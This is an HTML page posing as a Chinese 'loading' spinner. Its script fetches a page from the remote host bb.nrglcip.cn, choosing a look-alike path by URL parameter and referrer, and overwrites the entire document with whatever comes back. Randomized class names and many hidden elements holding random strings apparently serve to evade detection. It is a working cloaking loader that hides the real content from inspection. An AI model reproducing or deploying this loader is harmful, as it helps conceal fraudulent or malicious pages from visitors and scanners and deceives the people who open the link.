<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Ek0pgT5fnPV {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Ek0pgT5fnPV .k64dNmf {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Ek0pgT5fnPV .content {
            line-height: 50px;
            text-align: center
        }

        .Ek0pgT5fnPV .img {
            width: 100%
        }

        .Ek0pgT5fnPV .YwA2c8PhR {
            text-align: center
        }

        .Ek0pgT5fnPV .YwA2c8PhR span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Ek0pgT5fnPV .YwA2c8PhR span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Ek0pgT5fnPV .YwA2c8PhR span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Ek0pgT5fnPV .YwA2c8PhR span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Ek0pgT5fnPV .YwA2c8PhR span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Ek0pgT5fnPV .YwA2c8PhR span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Ek0pgT5fnPV .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function KKTbIcjRlXf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var QjSj4Jv = KKTbIcjRlXf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ QjSj4Jv +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ QjSj4Jv +".html?a=share";
		}
		
        fWrJljBR6=url+"#"+new Date().getTime();
        fWrJljBR6 && function() {
            $.get(fWrJljBR6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >xWGsWcTWqGM6NCiQLXYuiAScUjj1GJKKZ5MzBsfhDdDyZZ6qh8hRgylqVHwBTYi2KJ44QwqiUI11llfR83iuNkGHV4</b>
<div style='display:none'>iXg2mQVmLdaoQ2BKr9qiu5k</div>
<div style='display:none'>iXg2mQVmLdaoQ2BKr9qiu5k</div>
<p  style='display:none'>LNWbfnVWK9JEbbGKyUFdxrRgUqXLmRY2UocY0yYOn44rIZ0</p><div class="Ek0pgT5fnPV">
    <div class="k64dNmf">
        <div class="YwA2c8PhR">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>uZUzw6zv6iPIF9TIj2mjhX8P2ST8nlMYZksXN4xAB4vE7pqwpe2tULCikeXqvcAt7aIngnOZkTnRQ3RbX</a>
<a  href='#' style='display:none'>uZUzw6zv6iPIF9TIj2mjhX8P2ST8nlMYZksXN4xAB4vE7pqwpe2tULCikeXqvcAt7aIngnOZkTnRQ3RbX</a>
<b style='display:none' >cZiGvPQe4lfR9efedvHaJ4uOPx0l4RIs6I0Y7LqOZ6k5R2lWKLQuDs1CwYQl9OSD72qcu93YnV0CncY2</b>
<a  href='#' style='display:none'>uZUzw6zv6iPIF9TIj2mjhX8P2ST8nlMYZksXN4xAB4vE7pqwpe2tULCikeXqvcAt7aIngnOZkTnRQ3RbX</a>
<b style='display:none' >cZiGvPQe4lfR9efedvHaJ4uOPx0l4RIs6I0Y7LqOZ6k5R2lWKLQuDs1CwYQl9OSD72qcu93YnV0CncY2</b>
<li style='display:none' >tfBBDYwrnludffs6WfmeYvebdLW</li>
<img  src='' style='display:none'>
<li style='display:none' >tfBBDYwrnludffs6WfmeYvebdLW</li>
<p  style='display:none'>gVzzzd9dIuGVccKvkIi1JI2YDeeAoYoVsZdK6jhOcEloTu9wFQIy6qul8qCfgC5OCLXh7KghR4cOJOZYl</p>
<li style='display:none' >tfBBDYwrnludffs6WfmeYvebdLW</li></body>
</html>